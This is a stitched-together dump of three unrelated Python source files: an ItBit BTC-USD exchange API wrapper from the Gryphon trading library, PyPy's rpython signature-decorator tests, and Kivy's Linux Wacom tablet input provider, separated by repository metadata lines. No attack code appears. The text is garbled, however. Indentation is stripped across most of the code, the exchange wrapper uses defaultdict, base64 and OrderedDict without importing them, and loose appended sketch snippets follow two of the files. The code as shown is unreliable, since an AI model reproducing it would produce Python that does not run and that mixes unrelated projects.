import hashlib
import hmac
import json
import time
import urllib
import cdecimal
from cdecimal import Decimal
from gryphon.lib.exchange import exceptions
from gryphon.lib.exchange import order_types
from gryphon.lib.exchange.exchange_api_wrapper import ExchangeAPIWrapper
from gryphon.lib.logger import get_logger
from gryphon.lib.models.exchange import Balance
from gryphon.lib.money import Money
from gryphon.lib.time_parsing import parse
logger = get_logger(__name__)
class ItbitBTCUSDExchange(ExchangeAPIWrapper):
def __init__(self, session=None, configuration=None):
super(ItbitBTCUSDExchange, self).__init__(session)
self.name = u'ITBIT_BTC_USD'
self.friendly_name = u'Itbit BTC-USD'
self.base_url = 'https://api.itbit.com/v1'
self.currency = 'USD'
self.bid_string = 'buy'
self.ask_string = 'sell'
self.nonce = 1
# Configurables with defaults.
self.market_order_fee = Decimal('0.002')
self.limit_order_fee = Decimal('0')
self.fee = self.market_order_fee
self.fiat_balance_tolerance = Money('0.0001', 'USD')
self.volume_balance_tolerance = Money('0.00000001', 'BTC')
self.max_tick_speed = 1
self.min_order_size = Money('0', 'BTC')
self.use_cached_orderbook = False
if configuration:
self.configure(configuration)
@property
def wallet_id(self):
try:
self._wallet_id
except AttributeError:
self._wallet_id = self._load_env('ITBIT_BTC_USD_WALLET_ID')
return self._wallet_id
def req(self, req_method, url, **kwargs):
# Our auth_request method expects the params in the url.
assert '?' not in url
if 'params' in kwargs:
if kwargs['params']: # Check that it's not empty.
url += '?' + urllib.urlencode(kwargs['params'])
del kwargs['params']
req = super(ItbitBTCUSDExchange, self).req(req_method, url, **kwargs)
return req
def resp(self, req):
response = super(ItbitBTCUSDExchange, self).resp(req)
if 'error' in response and response['error']:
raise exceptions.ExchangeAPIErrorException(self, response['error'])
if 'code' in response:
errors_string = str(response['description'])
error_code = int(response['code'])
if error_code == 81001:
raise exceptions.InsufficientFundsError()
elif error_code == 10002:
raise exceptions.NonceError()
elif error_code == 81002:
raise exceptions.CancelOrderNotFoundError()
else:
raise exceptions.ExchangeAPIErrorException(
self,
'Code %s: %s' % (
error_code, errors_string,
))
return response
def all_trades(self, page=1):
req = self.all_trades_req(page)
return self.all_trades_resp(req)
def all_trades_req(self, page=1):
params = {}
if page:
params['page'] = page
return self.req(
'get',
'/wallets/%s/trades' % self.wallet_id,
params=params,
)
def all_trades_resp(self, req):
response = self.resp(req)
return response['tradingHistory']
def trades_for_orders(self, order_ids):
req = self.trades_for_orders_req()
return self.trades_for_orders_resp(req, order_ids)
def trades_for_orders_req(self):
return self.all_trades_req()
def trades_for_orders_resp(self, req, order_ids):
order_ids = [str(o) for o in order_ids]
trades = self.all_trades_resp(req)
matching_trades = defaultdict(list)
for trade in trades:
oid = str(trade['orderId'])
if oid in order_ids:
matching_trades[oid].append(trade)
return matching_trades
def all_orders(self, status=None, page=1):
req = self.all_orders_req(status, page)
return self.all_orders_resp(req)
def all_orders_req(self, status=None, page=1):
params = {}
if status:
params['status'] = status
if page:
params['page'] = page
return self.req(
'get',
'/wallets/%s/orders' % self.wallet_id,
params=params,
)
def all_orders_resp(self, req):
raw_orders = self.resp(req)
orders = []
for raw_order in raw_orders:
mode = self._order_mode_to_const(raw_order['side'])
volume = Money(raw_order['amount'], 'BTC')
volume_filled = Money(raw_order['amountFilled'], 'BTC')
volume_remaining = volume - volume_filled
order = {
'mode': mode,
'id': str(raw_order['id']),
'price': Money(raw_order['price'], 'USD'),
'volume': volume,
'volume_remaining': volume_remaining,
'status': raw_order['status']
}
orders.append(order)
return orders
# Common Exchange Methods
def auth_request(self, req_method, url, request_args):
"""
This modifies request_args.
"""
try:
self.api_key
self.secret
except AttributeError:
self.api_key = self._load_env('ITBIT_BTC_USD_API_KEY')
self.secret = self._load_env('ITBIT_BTC_USD_API_SECRET').encode('utf-8')
timestamp = int(round(time.time() * 1000))
nonce = self.nonce
body = ''
if 'data' in request_args:
body = json.dumps(request_args['data'])
request_args['data'] = body
message = self._auth_create_message(req_method, url, body, nonce, timestamp)
sig = self._auth_sign_message(message, nonce, url, self.secret)
if 'headers' not in request_args:
request_args['headers'] = {}
headers = request_args['headers']
headers['Authorization'] = self.api_key + ':' + sig
headers['X-Auth-Timestamp'] = str(timestamp)
headers['X-Auth-Nonce'] = str(nonce)
headers['Content-Type'] = 'application/json'
def _auth_create_message(self, verb, url, body, nonce, timestamp):
return json.dumps(
[verb.upper(), url, body, str(nonce), str(timestamp)],
separators=(',', ':'),
)
def _auth_sign_message(self, message, nonce, url, api_secret):
sha256_hash = hashlib.sha256()
nonced_message = str(nonce) + message
sha256_hash.update(nonced_message)
hash_digest = sha256_hash.digest()
msg_to_hmac = url.encode('utf8') + hash_digest
hmac_digest = hmac.new(api_secret, msg_to_hmac, hashlib.sha512).digest()
sig = base64.b64encode(hmac_digest)
return sig
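    # Hedged summary of the request-signing scheme implemented by the two helpers
    # above (values are illustrative): the signature sent in the Authorization
    # header is, in effect,
    #
    #   message = json.dumps([VERB, url, body, str(nonce), str(timestamp)],
    #                        separators=(',', ':'))
    #   sig = base64.b64encode(
    #       hmac.new(secret, url + sha256(str(nonce) + message).digest(),
    #                hashlib.sha512).digest())
    #
    # with the nonce and timestamp also echoed in the X-Auth-Nonce and
    # X-Auth-Timestamp headers by auth_request().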
def get_balance_req(self):
try:
self.user_id
except AttributeError:
self.user_id = self._load_env('ITBIT_BTC_USD_USER_ID')
return self.req('get', '/wallets/%s' % self.wallet_id)
def get_balance_resp(self, req):
response = self.resp(req)
raw_balances = response['balances']
btc_available = None
usd_available = None
for raw_balance in raw_balances:
if raw_balance['currency'] == 'XBT':
btc_available = Money(raw_balance['availableBalance'], 'BTC')
elif raw_balance['currency'] == 'USD':
usd_available = Money(raw_balance['availableBalance'], 'USD')
if btc_available is None or usd_available is None:
raise exceptions.ExchangeAPIErrorException(
self,
'missing expected balances',
)
balance = Balance()
balance['BTC'] = btc_available
balance['USD'] = usd_available
return balance
def get_ticker_req(self, verify=True):
return self.req(
'get',
'/markets/XBTUSD/ticker',
no_auth=True,
verify=verify,
)
def get_ticker_resp(self, req):
response = self.resp(req)
return {
'high': Money(response['high24h'], 'USD'),
'low': Money(response['low24h'], 'USD'),
'last': Money(response['lastPrice'], 'USD'),
'volume': Money(response['volume24h'], 'BTC')
}
def _get_orderbook_from_api_req(self, verify=True):
return self.req(
'get',
'/markets/XBTUSD/order_book',
no_auth=True,
verify=verify,
)
def place_order_req(self, mode, volume, price=None, order_type=order_types.LIMIT_ORDER):
side = self._order_mode_from_const(mode)
if price.currency != 'USD':
raise ValueError('price must be in USD')
if volume.currency != 'BTC':
raise ValueError('volume must be in BTC')
        # Truncate the volume instead of rounding it because it's better to
        # trade too little than too much.
volume = volume.round_to_decimal_places(8, rounding=cdecimal.ROUND_DOWN)
volume_str = '%.8f' % volume.amount
price_str = '%.2f' % price.amount
payload = {
'type': 'limit',
'currency': 'XBT',
'side': side,
'amount': volume_str,
'price': price_str,
'instrument': 'XBTUSD'
}
return self.req(
'post',
'/wallets/%s/orders/' % self.wallet_id,
data=payload,
)
def place_order_resp(self, req):
response = self.resp(req)
try:
order_id = str(response['id'])
return {'success': True, 'order_id': order_id}
except KeyError:
raise exceptions.ExchangeAPIErrorException(
self,
'response does not contain an order id',
)
def get_open_orders_req(self):
return self.all_orders_req(status='open')
def get_open_orders_resp(self, req):
open_orders = self.all_orders_resp(req)
for o in open_orders:
del o['status']
return open_orders
def get_order_details(self, order_id):
req = self.get_order_details_req()
return self.get_order_details_resp(req, order_id)
def get_order_details_req(self):
return self.get_multi_order_details_req()
def get_order_details_resp(self, req, order_id):
return self.get_multi_order_details_resp(req, [order_id])[order_id]
def get_multi_order_details(self, order_ids):
req = self.get_multi_order_details_req()
return self.get_multi_order_details_resp(req, order_ids)
def get_multi_order_details_req(self):
return self.trades_for_orders_req()
def get_multi_order_details_resp(self, req, order_ids):
# This is modeled after Bitstamp, where we get the order details from the
# trades endpoint directly. The caveat is that order_details will only work
# for the most recent 50 trades. Since we are always accounting trades right
# after they happen, this should be ok (and also affects Bitstamp).
order_ids = [str(o) for o in order_ids]
multi_trades = self.trades_for_orders_resp(req, order_ids)
data = {}
for order_id in order_ids:
total_usd = Money('0', 'USD')
total_btc = Money('0', 'BTC')
our_trades = []
our_type = None
if order_id in multi_trades:
trades = multi_trades[order_id]
for t in trades:
assert(t['currency1'] == 'XBT')
btc_amount = Money(t['currency1Amount'], 'BTC')
assert(t['currency2'] == 'USD')
usd_amount = Money(t['currency2Amount'], 'USD')
# This might also come back as XBT, but since ItBit has 0-fee
# trading right now, I can't tell.
assert(t['commissionCurrency'] == 'USD')
fee = Money(t['commissionPaid'], 'USD')
total_usd += usd_amount
total_btc += btc_amount
our_type = self._order_mode_to_const(t['direction'])
our_trades.append({
'time': parse(t['timestamp']).epoch,
'trade_id': None,
'fee': fee,
'btc': btc_amount,
'fiat': usd_amount,
})
time_created = None
if our_trades:
time_created = min([t['time'] for t in our_trades])
data[order_id] = {
'time_created': time_created,
'type': our_type,
'btc_total': total_btc,
'fiat_total': total_usd,
'trades': our_trades
}
return data
def cancel_order_req(self, order_id):
return self.req(
'delete',
'/wallets/%s/orders/%s' % (self.wallet_id, order_id),
)
def cancel_order_resp(self, req):
# In the success case, no response is given but we need to call resp() so it
# can catch any error cases.
response = self.resp(req) # noqa
return {'success': True}
def withdraw_crypto_req(self, address, volume):
if not isinstance(address, basestring):
raise TypeError('Withdrawal address must be a string')
if not isinstance(volume, Money) or volume.currency != self.volume_currency:
raise TypeError('Withdrawal volume must be in %s' % self.volume_currency)
volume_str = '%.8f' % volume.amount
payload = {
'currency': 'XBT',
'amount': volume_str,
'address': address,
}
return self.req(
'post',
'/wallets/%s/cryptocurrency_withdrawals' % self.wallet_id,
data=payload,
)
def withdraw_crypto_resp(self, req):
response = self.resp(req)
return {'success': True, 'exchange_withdrawal_id': response['withdrawalId']}
def get_order_audit_data(self, skip_recent=0, page=1):
"""
        Returns an OrderedDict mapping order ids to their filled volume (only
        includes orders that have some trades).
        Dropped the skip_recent flag because we don't seem to be using it anywhere.
"""
if skip_recent != 0:
            raise ValueError('skip_recent is deprecated')
orders = OrderedDict()
trades_to_audit = self.all_trades(page=page)
for trade in trades_to_audit:
order_id = str(trade['orderId'])
assert(trade['currency1'] == 'XBT')
trade_amount = abs(Money(trade['currency1Amount'], 'BTC'))
try:
orders[order_id] += trade_amount
except KeyError:
orders[order_id] = trade_amount
        # Remove the oldest 2 orders, because their trades might be wrapped around
        # a page gap, which would give us an inaccurate volume_filled number.
        # We need to remove 2 because there could be an ask and a bid.
try:
orders.popitem()
orders.popitem()
except KeyError:
pass
return orders
def fiat_deposit_fee(self, deposit_amount):
return Money('5', 'USD')
def fiat_withdrawal_fee(self, withdrawal_amount):
"""
        The ItBit fee is from their documentation, and an extra $15 is charged to us
        before the money shows up in our bank account (as of September 2016), so I assume
        that's an intermediary fee.
The fee should be a flat $50 on withdrawals > $10k, but we'll see.
"""
fee = Money('0', 'USD')
        if withdrawal_amount < Money('10000', 'USD'):
itbit_fee = Money('15', 'USD')
intermediary_fee = Money('15', 'USD')
fee = itbit_fee + intermediary_fee
else:
fee = Money('50', 'USD')
return fee
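# For reference, the tiered withdrawal fee above reduces to the following
# stand-alone sketch. Plain Decimal stands in for the exchange's Money class,
# and the $15 + $15 split is the assumption described in the docstring.
from decimal import Decimal

def usd_withdrawal_fee_sketch(amount_usd):
    if amount_usd < Decimal('10000'):
        # $15 ItBit fee plus the assumed $15 intermediary bank fee.
        return Decimal('30')
    # Assumed flat fee for withdrawals of $10k and above.
    return Decimal('50')

assert usd_withdrawal_fee_sketch(Decimal('2500')) == Decimal('30')
assert usd_withdrawal_fee_sketch(Decimal('25000')) == Decimal('50')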
|
rpython/rlib/test/test_signature.py
|
nanjekyejoannah/pypy
| 333 |
66729
|
import py
from rpython.rlib.signature import signature, finishsigs, FieldSpec, ClassSpec
from rpython.rlib import types
from rpython.annotator import model
from rpython.rtyper.llannotation import SomePtr
from rpython.annotator.signature import SignatureError
from rpython.translator.translator import TranslationContext, graphof
from rpython.rtyper.lltypesystem import rstr
from rpython.rtyper.annlowlevel import LowLevelAnnotatorPolicy
def annotate_at(f, policy=None):
t = TranslationContext()
t.config.translation.check_str_without_nul = True
a = t.buildannotator(policy=policy)
a.annotate_helper(f, [model.s_ImpossibleValue]*f.__code__.co_argcount, policy=policy)
return a
def sigof(a, f):
# returns [param1, param2, ..., ret]
g = graphof(a.translator, f)
return [a.binding(v) for v in g.startblock.inputargs] + [a.binding(g.getreturnvar())]
def getsig(f, policy=None):
a = annotate_at(f, policy=policy)
return sigof(a, f)
def check_annotator_fails(caller):
exc = py.test.raises(model.AnnotatorError, annotate_at, caller).value
assert caller.__name__ in str(exc)
def test_bookkeeping():
@signature('x', 'y', returns='z')
def f(a, b):
return a + len(b)
f.foo = 'foo'
assert f._signature_ == (('x', 'y'), 'z')
assert f.__name__ == 'f'
assert f.foo == 'foo'
assert f(1, 'hello') == 6
def test_basic():
@signature(types.int(), types.str(), returns=types.char())
def f(a, b):
return b[a]
assert getsig(f) == [model.SomeInteger(), model.SomeString(), model.SomeChar()]
def test_arg_errors():
@signature(types.int(), types.str(), returns=types.int())
def f(a, b):
return a + len(b)
@check_annotator_fails
def ok_for_body(): # would give no error without signature
f(2.0, 'b')
@check_annotator_fails
def bad_for_body(): # would give error inside 'f' body, instead errors at call
f('a', 'b')
def test_return():
@signature(returns=types.str())
def f():
return 'a'
assert getsig(f) == [model.SomeString()]
@signature(types.str(), returns=types.str())
def f(x):
return x
def g():
return f('a')
a = annotate_at(g)
assert sigof(a, f) == [model.SomeString(), model.SomeString()]
def test_return_errors():
@check_annotator_fails
@signature(returns=types.int())
def int_not_char():
return 'a'
@check_annotator_fails
@signature(types.str(), returns=types.int())
def str_to_int(s):
return s
@signature(returns=types.str())
def str_not_None():
return None
@check_annotator_fails
def caller_of_str_not_None():
return str_not_None()
@py.test.mark.xfail
def test_return_errors_xfail():
@check_annotator_fails
@signature(returns=types.str())
def str_not_None():
return None
def test_none():
@signature(returns=types.none())
def f():
pass
assert getsig(f) == [model.s_None]
def test_float():
@signature(types.longfloat(), types.singlefloat(), returns=types.float())
def f(a, b):
return 3.0
assert getsig(f) == [model.SomeLongFloat(), model.SomeSingleFloat(), model.SomeFloat()]
def test_unicode():
@signature(types.unicode(), returns=types.int())
def f(u):
return len(u)
assert getsig(f) == [model.SomeUnicodeString(), model.SomeInteger()]
def test_str0():
@signature(types.unicode0(), returns=types.str0())
def f(u):
return 'str'
assert getsig(f) == [model.SomeUnicodeString(no_nul=True),
model.SomeString(no_nul=True)]
def test_ptr():
policy = LowLevelAnnotatorPolicy()
@signature(types.ptr(rstr.STR), returns=types.none())
def f(buf):
pass
argtype = getsig(f, policy=policy)[0]
assert isinstance(argtype, SomePtr)
assert argtype.ll_ptrtype.TO == rstr.STR
def g():
f(rstr.mallocstr(10))
getsig(g, policy=policy)
def test_list():
@signature(types.list(types.int()), returns=types.int())
def f(a):
return len(a)
argtype = getsig(f)[0]
assert isinstance(argtype, model.SomeList)
item = argtype.listdef.listitem
assert item.s_value == model.SomeInteger()
assert item.resized == True
@check_annotator_fails
def ok_for_body():
f(['a'])
@check_annotator_fails
def bad_for_body():
f('a')
@signature(returns=types.list(types.char()))
def ff():
return ['a']
@check_annotator_fails
def mutate_broader():
ff()[0] = 'abc'
@check_annotator_fails
def mutate_unrelated():
ff()[0] = 1
@check_annotator_fails
@signature(types.list(types.char()), returns=types.int())
def mutate_in_body(l):
l[0] = 'abc'
return len(l)
def can_append():
l = ff()
l.append('b')
getsig(can_append)
def test_array():
@signature(returns=types.array(types.int()))
def f():
return [1]
rettype = getsig(f)[0]
assert isinstance(rettype, model.SomeList)
item = rettype.listdef.listitem
assert item.s_value == model.SomeInteger()
assert item.resized == False
def try_append():
l = f()
l.append(2)
check_annotator_fails(try_append)
def test_dict():
@signature(returns=types.dict(types.str(), types.int()))
def f():
return {'a': 1, 'b': 2}
rettype = getsig(f)[0]
assert isinstance(rettype, model.SomeDict)
assert rettype.dictdef.dictkey.s_value == model.SomeString()
assert rettype.dictdef.dictvalue.s_value == model.SomeInteger()
def test_instance():
class C1(object):
pass
class C2(C1):
pass
class C3(C2):
pass
@signature(types.instance(C3), returns=types.instance(C2))
def f(x):
assert isinstance(x, C2)
return x
argtype, rettype = getsig(f)
assert isinstance(argtype, model.SomeInstance)
assert argtype.classdef.classdesc.pyobj == C3
assert isinstance(rettype, model.SomeInstance)
assert rettype.classdef.classdesc.pyobj == C2
@check_annotator_fails
def ok_for_body():
f(C2())
@check_annotator_fails
def bad_for_body():
f(C1())
@check_annotator_fails
def ok_for_body():
f(None)
def test_instance_or_none():
class C1(object):
pass
class C2(C1):
pass
class C3(C2):
pass
@signature(types.instance(C3, can_be_None=True), returns=types.instance(C2, can_be_None=True))
def f(x):
assert isinstance(x, C2) or x is None
return x
argtype, rettype = getsig(f)
assert isinstance(argtype, model.SomeInstance)
assert argtype.classdef.classdesc.pyobj == C3
assert argtype.can_be_None
assert isinstance(rettype, model.SomeInstance)
assert rettype.classdef.classdesc.pyobj == C2
assert rettype.can_be_None
@check_annotator_fails
def ok_for_body():
f(C2())
@check_annotator_fails
def bad_for_body():
f(C1())
def test_self():
@finishsigs
class C(object):
@signature(types.self(), types.self(), returns=types.none())
def f(self, other):
pass
class D1(C):
pass
class D2(C):
pass
def g():
D1().f(D2())
a = annotate_at(g)
argtype = sigof(a, C.__dict__['f'])[0]
assert isinstance(argtype, model.SomeInstance)
assert argtype.classdef.classdesc.pyobj == C
def test_self_error():
class C(object):
@signature(types.self(), returns=types.none())
def incomplete_sig_meth(self):
pass
exc = py.test.raises(SignatureError, annotate_at, C.incomplete_sig_meth).value
assert 'incomplete_sig_meth' in str(exc)
assert 'finishsigs' in str(exc)
def test_any_as_argument():
@signature(types.any(), types.int(), returns=types.float())
def f(x, y):
return x + y
@signature(types.int(), returns=types.float())
def g(x):
return f(x, x)
sig = getsig(g)
assert sig == [model.SomeInteger(), model.SomeFloat()]
@signature(types.float(), returns=types.float())
def g(x):
return f(x, 4)
sig = getsig(g)
assert sig == [model.SomeFloat(), model.SomeFloat()]
@signature(types.str(), returns=types.int())
def cannot_add_string(x):
return f(x, 2)
exc = py.test.raises(model.AnnotatorError, annotate_at, cannot_add_string).value
assert 'Blocked block' in str(exc)
def test_return_any():
@signature(types.int(), returns=types.any())
def f(x):
return x
sig = getsig(f)
assert sig == [model.SomeInteger(), model.SomeInteger()]
@signature(types.str(), returns=types.any())
def cannot_add_string(x):
return f(3) + x
exc = py.test.raises(model.AnnotatorError, annotate_at, cannot_add_string).value
assert 'Blocked block' in str(exc)
assert 'cannot_add_string' in str(exc)
@py.test.mark.xfail
def test_class_basic():
class C(object):
_fields_ = ClassSpec({'x': FieldSpec(types.int)})
def wrong_type():
c = C()
c.x = 'a'
check_annotator_fails(wrong_type)
def bad_field():
c = C()
c.y = 3
check_annotator_fails(bad_field)
@py.test.mark.xfail
def test_class_shorthand():
class C1(object):
_fields_ = {'x': FieldSpec(types.int)}
def wrong_type_1():
c = C1()
c.x = 'a'
check_annotator_fails(wrong_type_1)
class C2(object):
_fields_ = ClassSpec({'x': types.int})
def wrong_type_2():
c = C2()
c.x = 'a'
    check_annotator_fails(wrong_type_2)
@py.test.mark.xfail
def test_class_inherit():
class C(object):
_fields_ = ClassSpec({'x': FieldSpec(types.int)})
    class C1(C):
_fields_ = ClassSpec({'y': FieldSpec(types.int)})
    class C2(C):
_fields_ = ClassSpec({'y': FieldSpec(types.int)}, inherit=True)
def no_inherit():
c = C1()
c.x = 3
check_annotator_fails(no_inherit)
def good():
c = C2()
c.x = 3
annotate_at(good)
def wrong_type():
c = C2()
c.x = 'a'
check_annotator_fails(wrong_type)
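# A minimal sketch of the decorator outside the test helpers above; it assumes
# an rpython checkout on sys.path, exactly like the imports at the top of this
# file, and the function name below is ours, not part of the test suite.
from rpython.rlib.signature import signature
from rpython.rlib import types

@signature(types.int(), types.int(), returns=types.int())
def clamped_add(a, b):
    return min(a + b, 100)

# getsig(clamped_add) would report
# [SomeInteger(), SomeInteger(), SomeInteger()], mirroring test_basic above.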
|
kivy/input/providers/linuxwacom.py
|
VICTORVICKIE/kivy
| 13,889 |
66757
|
<filename>kivy/input/providers/linuxwacom.py
'''
Native support of Wacom tablet from linuxwacom driver
=====================================================
To configure LinuxWacom, add this to your configuration::
[input]
pen = linuxwacom,/dev/input/event2,mode=pen
finger = linuxwacom,/dev/input/event3,mode=touch
.. note::
You must have read access to the input event.
You can use a custom range for the X, Y and pressure values.
On some drivers, the range reported is invalid.
To fix that, you can add these options to the argument line:
* invert_x : 1 to invert X axis
* invert_y : 1 to invert Y axis
* min_position_x : X minimum
* max_position_x : X maximum
* min_position_y : Y minimum
* max_position_y : Y maximum
* min_pressure : pressure minimum
* max_pressure : pressure maximum
'''
__all__ = ('LinuxWacomMotionEventProvider', 'LinuxWacomMotionEvent')
import os
from kivy.input.motionevent import MotionEvent
from kivy.input.shape import ShapeRect
class LinuxWacomMotionEvent(MotionEvent):
def depack(self, args):
self.is_touch = True
self.sx = args['x']
self.sy = args['y']
self.profile = ['pos']
if 'size_w' in args and 'size_h' in args:
self.shape = ShapeRect()
self.shape.width = args['size_w']
self.shape.height = args['size_h']
self.profile.append('shape')
if 'pressure' in args:
self.pressure = args['pressure']
self.profile.append('pressure')
super(LinuxWacomMotionEvent, self).depack(args)
def __str__(self):
return '<LinuxWacomMotionEvent id=%d pos=(%f, %f) device=%s>' \
% (self.id, self.sx, self.sy, self.device)
if 'KIVY_DOC' in os.environ:
# documentation hack
LinuxWacomMotionEventProvider = None
else:
import threading
import collections
import struct
import fcntl
from kivy.input.provider import MotionEventProvider
from kivy.input.factory import MotionEventFactory
from kivy.logger import Logger
#
# This part is taken from linux-source-2.6.32/include/linux/input.h
#
# Event types
EV_SYN = 0x00
EV_KEY = 0x01
EV_REL = 0x02
EV_ABS = 0x03
EV_MSC = 0x04
EV_SW = 0x05
EV_LED = 0x11
EV_SND = 0x12
EV_REP = 0x14
EV_FF = 0x15
EV_PWR = 0x16
EV_FF_STATUS = 0x17
EV_MAX = 0x1f
EV_CNT = (EV_MAX + 1)
KEY_MAX = 0x2ff
# Synchronization events
SYN_REPORT = 0
SYN_CONFIG = 1
SYN_MT_REPORT = 2
# Misc events
MSC_SERIAL = 0x00
MSC_PULSELED = 0x01
MSC_GESTURE = 0x02
MSC_RAW = 0x03
MSC_SCAN = 0x04
MSC_MAX = 0x07
MSC_CNT = (MSC_MAX + 1)
ABS_X = 0x00
ABS_Y = 0x01
ABS_PRESSURE = 0x18
ABS_MISC = 0x28 # if 0, it's touch up
ABS_MT_TOUCH_MAJOR = 0x30 # Major axis of touching ellipse
ABS_MT_TOUCH_MINOR = 0x31 # Minor axis (omit if circular)
ABS_MT_WIDTH_MAJOR = 0x32 # Major axis of approaching ellipse
ABS_MT_WIDTH_MINOR = 0x33 # Minor axis (omit if circular)
ABS_MT_ORIENTATION = 0x34 # Ellipse orientation
ABS_MT_POSITION_X = 0x35 # Center X ellipse position
ABS_MT_POSITION_Y = 0x36 # Center Y ellipse position
ABS_MT_TOOL_TYPE = 0x37 # Type of touching device
ABS_MT_BLOB_ID = 0x38 # Group a set of packets as a blob
ABS_MT_TRACKING_ID = 0x39 # Unique ID of initiated contact
ABS_MT_PRESSURE = 0x3a # Pressure on contact area
# some ioctl base (with 0 value)
EVIOCGNAME = 2147501318
EVIOCGBIT = 2147501344
EVIOCGABS = 2149074240
# sizeof(struct input_event)
struct_input_event_sz = struct.calcsize('LLHHi')
struct_input_absinfo_sz = struct.calcsize('iiiiii')
sz_l = struct.calcsize('Q')
class LinuxWacomMotionEventProvider(MotionEventProvider):
options = ('min_position_x', 'max_position_x',
'min_position_y', 'max_position_y',
'min_pressure', 'max_pressure',
'invert_x', 'invert_y')
def __init__(self, device, args):
super(LinuxWacomMotionEventProvider, self).__init__(device, args)
self.input_fn = None
self.default_ranges = dict()
self.mode = 'touch'
# split arguments
args = args.split(',')
if not args:
Logger.error('LinuxWacom: No filename given in config')
Logger.error('LinuxWacom: Use /dev/input/event0 for example')
return
# read filename
self.input_fn = args[0]
Logger.info('LinuxWacom: Read event from <%s>' % self.input_fn)
# read parameters
for arg in args[1:]:
if arg == '':
continue
arg = arg.split('=')
# ensure it's a key = value
if len(arg) != 2:
err = 'LinuxWacom: Bad parameter' \
'%s: Not in key=value format.' % arg
Logger.error(err)
continue
# ensure the key exist
key, value = arg
if key == 'mode':
self.mode = value
continue
if key not in LinuxWacomMotionEventProvider.options:
Logger.error('LinuxWacom: unknown %s option' % key)
continue
# ensure the value
try:
self.default_ranges[key] = int(value)
except ValueError:
                    err = 'LinuxWacom: value %s invalid for %s' % (value, key)
Logger.error(err)
continue
# all good!
msg = 'LinuxWacom: Set custom %s to %d' % (key, int(value))
Logger.info(msg)
Logger.info('LinuxWacom: mode is <%s>' % self.mode)
def start(self):
if self.input_fn is None:
return
self.uid = 0
self.queue = collections.deque()
self.thread = threading.Thread(
target=self._thread_run,
kwargs=dict(
queue=self.queue,
input_fn=self.input_fn,
device=self.device,
default_ranges=self.default_ranges))
self.thread.daemon = True
self.thread.start()
def _thread_run(self, **kwargs):
input_fn = kwargs.get('input_fn')
queue = kwargs.get('queue')
device = kwargs.get('device')
drs = kwargs.get('default_ranges').get
touches = {}
touches_sent = []
l_points = {}
# prepare some vars to get limit of some component
range_min_position_x = 0
range_max_position_x = 2048
range_min_position_y = 0
range_max_position_y = 2048
range_min_pressure = 0
range_max_pressure = 255
invert_x = int(bool(drs('invert_x', 0)))
invert_y = int(bool(drs('invert_y', 0)))
reset_touch = False
def process(points):
actives = list(points.keys())
for args in points.values():
tid = args['id']
try:
touch = touches[tid]
except KeyError:
touch = LinuxWacomMotionEvent(device, tid, args)
touches[touch.id] = touch
if touch.sx == args['x'] \
and touch.sy == args['y'] \
and tid in touches_sent:
continue
touch.move(args)
if tid not in touches_sent:
queue.append(('begin', touch))
touches_sent.append(tid)
queue.append(('update', touch))
for tid in list(touches.keys())[:]:
if tid not in actives:
touch = touches[tid]
if tid in touches_sent:
touch.update_time_end()
queue.append(('end', touch))
touches_sent.remove(tid)
del touches[tid]
def normalize(value, vmin, vmax):
return (value - vmin) / float(vmax - vmin)
# open the input
try:
fd = open(input_fn, 'rb')
except IOError:
Logger.exception('Unable to open %s' % input_fn)
return
# get the controller name (EVIOCGNAME)
device_name = fcntl.ioctl(fd, EVIOCGNAME + (256 << 16),
" " * 256).split('\x00')[0]
Logger.info('LinuxWacom: using <%s>' % device_name)
# get abs infos
bit = fcntl.ioctl(fd, EVIOCGBIT + (EV_MAX << 16), ' ' * sz_l)
bit, = struct.unpack('Q', bit)
for x in range(EV_MAX):
# preserve this, we may want other things than EV_ABS
if x != EV_ABS:
continue
# EV_ABS available for this device ?
if (bit & (1 << x)) == 0:
continue
# ask abs info keys to the devices
sbit = fcntl.ioctl(fd, EVIOCGBIT + x + (KEY_MAX << 16),
' ' * sz_l)
sbit, = struct.unpack('Q', sbit)
for y in range(KEY_MAX):
if (sbit & (1 << y)) == 0:
continue
absinfo = fcntl.ioctl(fd, EVIOCGABS + y +
(struct_input_absinfo_sz << 16),
' ' * struct_input_absinfo_sz)
abs_value, abs_min, abs_max, abs_fuzz, \
abs_flat, abs_res = struct.unpack('iiiiii', absinfo)
if y == ABS_X:
range_min_position_x = drs('min_position_x', abs_min)
range_max_position_x = drs('max_position_x', abs_max)
Logger.info('LinuxWacom: ' +
'<%s> range position X is %d - %d' % (
device_name, abs_min, abs_max))
elif y == ABS_Y:
range_min_position_y = drs('min_position_y', abs_min)
range_max_position_y = drs('max_position_y', abs_max)
Logger.info('LinuxWacom: ' +
'<%s> range position Y is %d - %d' % (
device_name, abs_min, abs_max))
elif y == ABS_PRESSURE:
range_min_pressure = drs('min_pressure', abs_min)
range_max_pressure = drs('max_pressure', abs_max)
Logger.info('LinuxWacom: ' +
'<%s> range pressure is %d - %d' % (
device_name, abs_min, abs_max))
# read until the end
changed = False
touch_id = 0
touch_x = 0
touch_y = 0
touch_pressure = 0
while fd:
data = fd.read(struct_input_event_sz)
if len(data) < struct_input_event_sz:
break
# extract each event
                for i in range(len(data) // struct_input_event_sz):
ev = data[i * struct_input_event_sz:]
# extract timeval + event infos
tv_sec, tv_usec, ev_type, ev_code, ev_value = \
struct.unpack('LLHHi', ev[:struct_input_event_sz])
if ev_type == EV_SYN and ev_code == SYN_REPORT:
if touch_id in l_points:
p = l_points[touch_id]
else:
p = dict()
l_points[touch_id] = p
p['id'] = touch_id
if not reset_touch:
p['x'] = touch_x
p['y'] = touch_y
p['pressure'] = touch_pressure
if self.mode == 'pen' \
and touch_pressure == 0 \
and not reset_touch:
del l_points[touch_id]
if changed:
if 'x' not in p:
reset_touch = False
continue
process(l_points)
changed = False
if reset_touch:
l_points.clear()
reset_touch = False
process(l_points)
elif ev_type == EV_MSC and ev_code == MSC_SERIAL:
touch_id = ev_value
elif ev_type == EV_ABS and ev_code == ABS_X:
val = normalize(ev_value,
range_min_position_x,
range_max_position_x)
if invert_x:
val = 1. - val
touch_x = val
changed = True
elif ev_type == EV_ABS and ev_code == ABS_Y:
val = 1. - normalize(ev_value,
range_min_position_y,
range_max_position_y)
if invert_y:
val = 1. - val
touch_y = val
changed = True
elif ev_type == EV_ABS and ev_code == ABS_PRESSURE:
touch_pressure = normalize(ev_value,
range_min_pressure,
range_max_pressure)
changed = True
elif ev_type == EV_ABS and ev_code == ABS_MISC:
if ev_value == 0:
reset_touch = True
def update(self, dispatch_fn):
# dispatch all event from threads
try:
while True:
event_type, touch = self.queue.popleft()
dispatch_fn(event_type, touch)
except:
pass
